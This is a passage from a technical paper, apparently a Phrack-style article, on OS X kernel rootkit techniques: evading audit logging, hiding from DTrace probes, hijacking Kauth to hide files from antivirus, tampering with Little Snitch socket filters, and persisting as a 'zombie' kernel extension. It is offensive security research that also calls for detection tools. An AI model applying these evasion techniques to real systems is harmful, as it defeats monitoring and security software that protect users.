noticed if you peak at fs_usage or sc_usage code (verify the lookup()
[bsd/vfs/vfs_lookup.c] kernel function to see how fs_usage gets the path
name for syscalls such as open()).
Using an example with the open syscall (to be used later with in Kauth
section):
The vnode check handler that we can install has the following prototype:
Our handler will receive a pointer to the vnode structure and make
it possible to dump the filename and even transverse the full path
(remember that vnodes exist in a linked list).
To attack this we can use the same old story: hook those functions,
or attack the mac_policy_list using the syscall handler concept, or
something else. When loading the rootkit it might also be useful to
lookup the policy list to verify if there is anything else installed
other than default modules. The system owner might be a bit smarter than
the vast majority ;-).
Let's move to what really matters for us, evil stuff! Auditing is
implemented with macros [bsd/security/audit/audit.h] inside BSD and
Mach system calls (and some other places). The following code snippet
is from unix_syscall64 implementation, where entry and exit macros are
placed before the syscall function to be executed is called:
AUDIT_SYSCALL_ENTER(code, p, uthread);
error = (*(callp->sy_call))((void *) p, uargp, &(uthread->uu_rval[0]));
AUDIT_SYSCALL_EXIT(code, p, uthread, error);
/*
* audit_syscall_enter() is called on entry to each system call. It is
* responsible for deciding whether or not to audit the call
* (preselection), and if so, allocating a per-thread audit record.
* audit_new() will fill in basic thread/credential properties.
*/
/*
* audit_syscall_exit() is called from the return of every system call, or
* in the event of exit1(), during the execution of exit1(). It is
* responsible for committing the audit record, if any, along with return
* condition.
*/
When committed, the audit record will be added to an audit queue and
removed from the user thread structure (struct uthread, field uu_ar
[bsd/sys/user.h]).
void
audit_syscall_exit(unsigned int code, int error, __unused proc_t proc,
struct uthread *uthread) {
(...)
audit_commit(uthread->uu_ar, error, retval);
out:
uthread->uu_ar = NULL;
}
- audit_syscall_exit
- audit_mach_syscall_exit
- audit_proc_coredump
- audit_session_event
This will call the function responsible to set the audit record field:
With this information we just need to hold the queue commit to disk until
enough information to find the correct session ID is available. When we
have it we can edit the queue and remove all the entries that match that
session ID.
Last but not least, there is a critical task left! Auditing logs must be
cleaned in case auditing was already properly configured. The bad news
is that you will have to do this dirty work yourself. Do not forget that
the logs are in binary format and OpenBSM's source at [29] can be helpful
(praudit outputs XML format so it might be a good starting point).
This provider allows to trace every BSD system call entry and return (the
provider for Mach traps is mach_trap). A quick example that prints the path
argument being passed to the open() syscall:
# dtrace -n 'syscall::open:entry
{
printf("opening %s", copyinstr(arg0));
}'
dtrace: description 'syscall::open:entry' matched 1 probe
CPU ID FUNCTION:NAME
0 119 open:entry opening /dev/dtracehelper
0 119 open:entry opening
/usr/share/terminfo/78/xterm-256color
0 119 open:entry opening /dev/tty
0 119 open:entry opening /etc/pf.conf
(...)
lck_mtx_lock(&dtrace_systrace_lock);
if (sysent[sysnum].sy_callc == systrace_sysent[sysnum].stsy_underlying)
{
vm_offset_t dss = (vm_offset_t)&dtrace_systrace_syscall;
ml_nofault_copy((vm_offset_t)&dss,
(vm_offset_t)&sysent[sysnum].sy_callc, sizeof(vm_offset_t));
}
lck_mtx_unlock(&dtrace_systrace_lock);
(...)
Before:
What are the conclusions from all this? If only the sysent table function
pointers are modified by the rootkit, DTrace will be unable to directly
detect the rootkit using syscall provider. The modified pointer will
be copied by DTrace and return to it. DTrace is blind to the original
function because it does not exist anymore in the table, only inside
our modified version.
fbt stands for function boundary tracing and allows tracing function entry
and exit of almost all kernel related functions (there is a small list of
untraceable functions called critical_blacklist [bsd/dev/i386/fbt_x86.c]).
The possibilities to detect malicious code using this provider are higher
due to its design and implementation. An example using rubilyn rootkit
is the best way to demonstrate this:
0 99661 unix_syscall64:entry
0 97082 kauth_cred_uthread_update:entry
0 2119 new_getdirentries64:entry <- hooked syscall!!!
0 91985 getdirentries64:entry <- original function
0 92677 vfs_context_current:entry
A very simple trace is able to detect both the hooked syscall and the
call to original getdirentries64. Houston, we have a rootkit problem!
"On x86, FBT uses a trap-based mechanism that replaces one of the
instructions in the sequence that establishes a stack frame (or one of
the instructions in the sequence that dismantles a stack frame) with an
instruction to transfer control to the interrupt descriptor table (IDT).
The IDT handler uses the trapping instruction pointer to look up the FBT
probe and transfers control into DTrace. Upon return from DTrace, the
replaced instruction is emulated from the trap handler by manipulating
the trap stack."
After:
# dtrace -n fbt::getdirentries64:entry
The function that does all the work to find the patch location is
__provide_probe_64() [bsd/dev/i386/fbt_x86.c] (FBT_PATCHVAL defines the
illegal opcode byte).
if (fbt->fbtp_currentval != fbt->fbtp_patchval)
{
(void)ml_nofault_copy((vm_offset_t)&fbt->fbtp_patchval,
(vm_offset_t)fbt->fbtp_patchpoint, sizeof(fbt->fbtp_patchval));
fbt->fbtp_currentval = fbt->fbtp_patchval;
ctl->mod_nenabled++;
}
The following diagram shows the trap handling of the illegal instruction:
It is not possible to just patch this call because the emul value
determines the type of emulation that needs to be executed after.
dtrace_invop is used by fbt and sdt providers and does nothing more than
calling function pointers contained in dtrace_invop_hdlr linked list
[bsd/dev/dtrace/dtrace_subr.c].
if (fbt->fbtp_roffset == 0) {
x86_saved_state64_t *regs = (x86_saved_state64_t *)state;
CPU->cpu_dtrace_caller = *(uintptr_t
*)(((uintptr_t)(regs->isf.rsp))+sizeof(uint64_t)); // 8(%rsp)
/* 64-bit ABI, arguments passed in registers. */
dtrace_probe(fbt->fbtp_id, regs->rdi, regs->rsi, regs->rdx,
regs->rcx, regs->r8); // <---------- call to dtrace functionality --------
CPU->cpu_dtrace_caller = 0;
} else {
dtrace_probe(fbt->fbtp_id, fbt->fbtp_roffset, rval, 0, 0,
0);
CPU->cpu_dtrace_caller = 0;
}
return (fbt->fbtp_rval); <- the emul value
}
}
return (0);
}
kern_return_t
fbt_perfCallback_hooked(int trapno, x86_saved_state_t *tagged_regs,
uintptr_t *lo_spp, __unused int unused2)
{
kern_return_t retval = KERN_FAILURE;
x86_saved_state64_t *saved_state = saved_state64(tagged_regs);
Functions that we want to hide from DTrace will never reach its
probe system, effectively hiding them. The performance impact should
be extremely low unless there are too many functions to hide, and
hide_from_fbt() takes too long to execute.
This time let me show you how to attack Kauth's. The example will be based
on the KAUTH_FILEOP_OPEN action and open() syscall. To avoid unnecessary
browsing of XNU sources, this is the worflow up to the interesting point:
I do not want to spam you with code but allow me to reprint the fileop
function:
int
kauth_authorize_fileop(kauth_cred_t credential, kauth_action_t action,
uintptr_t arg0, uintptr_t arg1)
{
char *namep = NULL;
int name_len;
uintptr_t arg2 = 0;
if (namep != NULL) {
release_pathbuff(namep);
}
return(0);
}
It is clear now that this is a great place to hijack and hide files
we do not want the AV to scan (or some other listener - this is also a
good feature for a file monitor). We just need to verify if current file
matches our list and return 0 if positive, else call the original code
(all these functions are not static so we can easily find the symbols).
struct sflt_filter {
sflt_handle sf_handle;
int sf_flags;
char *sf_name;
sf_unregistered_func sf_unregistered;
sf_attach_func sf_attach; // handles attaches to sockets.
sf_detach_func sf_detach;
sf_notify_func sf_notify;
sf_getpeername_func sf_getpeername;
sf_getsockname_func sf_getsockname;
sf_data_in_func sf_data_in; // handles incoming data.
sf_data_out_func sf_data_out;
sf_connect_in_func sf_connect_in; // handles inbound
connections.
sf_connect_out_func sf_connect_out;
sf_bind_func sf_bind; // handles binds.
(...)
}
History repeats itself and once again the easiest way is to hook
the function pointers and do whatever we want. Little Snitch driver
(it's an I/O Kit driver and not a kernel extension) loads very early so
hooking sflt_register() and modifying the structure on the fly is not
very interesting. We need to lookup the structure in kernel memory and
modify it.
Many different socket filters can be attached to the same socket so there
must be a data structure holding this information. The interesting source
file is bsd/kern/kpi_socketfilter.c, where a tail queue is created and
referenced using a static variable sock_filter_head.
struct socket_filter {
TAILQ_ENTRY(socket_filter) sf_protosw_next;
TAILQ_ENTRY(socket_filter) sf_global_next;
struct socket_filter_entry *sf_entry_head;
TAILQ_HEAD(socket_filter_list, socket_filter);
static struct socket_filter_list sock_filter_head;
Iterating around the tail queue we find the Little Snitch socket filter:
/*!
@typedef sf_attach_func
struct Cookie
{
(...)
0x48: IOLock *lock;
0x74: pid_t pid; // process to whom the socket belongs to
0x78: int32_t count;
0x7C: int32_t *xxx;
0x80: int32_t protocol;
0x85: int8_t domain;
0x86: int8_t type;
(...)
}
The idea here is to explore kernel memory allocations and leaks. Kernel
and kernel extensions share the same memory map, kernel_map, and there
are a few kernel functions "families" to allocate kernel memory:
- kalloc.
- kmem_alloc.
- OSMalloc.
- MALLOC/FREE.
- IOMalloc/IOFree for I/O Kit.
My initial (too complicated idea) was to load the rootkit, hook whatever
was needed, unload the rootkit, and then protect the memory that was
used. This was based in the fact that unloading does not destroy the
rootkit memory so everything would work as long those blocks of memory
were not reallocated to something else. I wanted to edit with kernel
memory map and mark those pages as used.
load rootkit -> find rootkit -> calculate rootkit -> alloc zombie
base address size memory
|
v
unload original <- transfer control <- fix memory <- copy rootkit into
rootkit to zombie protections zombie memory
The control transfer to zombie code has a small caveat that inherits
from previous paragraph - the start function must return a value so we
can't simple jump into the zombie. Two ideas come to my mind to solve
this problem; first we can hook some kernel function and there transfer
control to zombie, second we can use kernel threads - create a new thread
and let the main one return.
kern_return_t
kernel_thread_start(thread_continue_t continuation, void *parameter,
thread_t *new_thread);
The zombie thread start function should have a prototype like this:
To set the start function pointer we need to find that function address
in the zombie memory. Symbol information is not available (__LINKEDIT
segment is not loaded) and to avoid reading from the filesystem we can
use a quick trick - find the rootkit base address and find the difference
to the address of start function in the rootkit (since that is in the
original rootkit code). Since we have the zombie start address returned
from the memory allocation, we just need to add the difference and we
have the location of the start function inside the zombie. Computed the
function pointer we can now pass it to kernel_thread_start() and be sure
that zombie code will execute.
Next problem...
Copying the original rootkit into the new area invalidates the external
symbols solved when kernel extension was loaded. Kernel extension code
is position independent (PIC) so calls are made referencing the current
instruction address. If we modify the location address and maintain
the offset, then the symbol is not valid anymore and most probably will
generate a kernel panic when executed.
Example:
Rootkit loaded in memory:
gdb$ x/10i 0xffffff7f83ad671c
0xffffff7f83ad671c: 55 push rbp
0xffffff7f83ad671d: 48 89 e5 mov rbp,rsp
0xffffff7f83ad6720: 48 8d 3d d1 09 00 00 lea rdi,[rip+0x9d1]
# 0xffffff7f83ad70f8 <- string reference
0xffffff7f83ad6727: 30 c0 xor al,al
0xffffff7f83ad6729: 5d pop rbp
0xffffff7f83ad672a: e9 61 29 35 7f jmp 0xffffff8002e29090 <-
call to kernel's printf, solved when kext was loaded
/var/log/system.log:
May 7 02:26:10 mountain-lion-64.local com.apple.kextd[12]: Failed to load
/Users/reverser/the_flying_circus.kext - (libkern/kext) kext (kmod)
start/stop routine failed.
dmesg:
Kext put.as.the-flying-circus start failed (result 0x5).
Kext put.as.the-flying-circus failed to load (0xdc008017).
Failed to load kext put.as.the-flying-circus (error 0xdc008017).
To detect when to restore the logging features, we can use a quick and
dirty hack. Loop inside the zombie thread until kextload process is
finished. Then the original bytes can be restored and its business as
usual but with a zombie rootkit loaded.
The foundation blocks to zombie rootkits are exposed, the remaining are
implementation details that do not matter much here and can be found in
the attached sample code.
This paper is considerably huge but still incomplete! There are a few
missing areas and you probably spotted a few problems with some of its
approaches. Let me try to describe some.
One of the main problems is the dependency on proc, task and some other
structures. These are opaque to outsiders for one good reason - they
are changed frequently between major OS X versions. For example, when I
was researching I forgot to include a define and things were not working
(lucky or not it was not crashing the test system). Three different proc_t
(and task_t) versions must be included to create a rootkit compatible
with the three latest major OS X versions. And it is most certain that
it will break with a new major release.
Detection and creation of tools is the next logical step. OS X lacks this
kind of tools and here lies a good opportunity for future research and
development. The defensive side against rootkits is even more challenging
and requires additional creativity (and maybe kernel knowledge) to
develop safer and reliable detection methods. The challenge is issued :-).
This was a long paper and I sincerely hope it was useful in some way
to you who had the time and patience to read it. New ideas are hard to
come by and there (probably) are many here that were somehow previously
explored by others. Please apologize me if missing attribution - it
is only because I do not know or I am not aware who is the original
author/source. It is particularly difficult when you read so much stuff
thru the years.
And a big middle finger to Apple as a company, born from the hacking
spirit and now transformed against hacking.
--[ 9 - References
[7] Miller, Charlie & Zovi, Dino Dai, The Mac Hacker's Handbook
Wiley Publishing, 2009, ISBN: 978-0-470-39536-3
[11] fG!, Secuinside 2012, How to Start your Apple reverse engineering
adventure, http://reverse.put.as/wp-content/uploads/2012/07/Secuinside
-2012-Presentation.pdf
[20] McKusick et al, The Design and Implementation of the 4.4BSD Oper.
System, Addison Wesley, 1996, ISBN: 0-201-54979-4
[21] fG!, Av-monster: the monster that loves yummy OS X anti-virus software
http://reverse.put.as/2012/02/13/av-monster-the-monster-that-loves-yum
my-os-x-anti-virus-software/
[32] Hoglund, Greg & Butler, Jamie, Rootkits: Subverting the Windows
Kernel, Addison-Wesley, 2005, ISBN-10: 0321294319
--[ EOF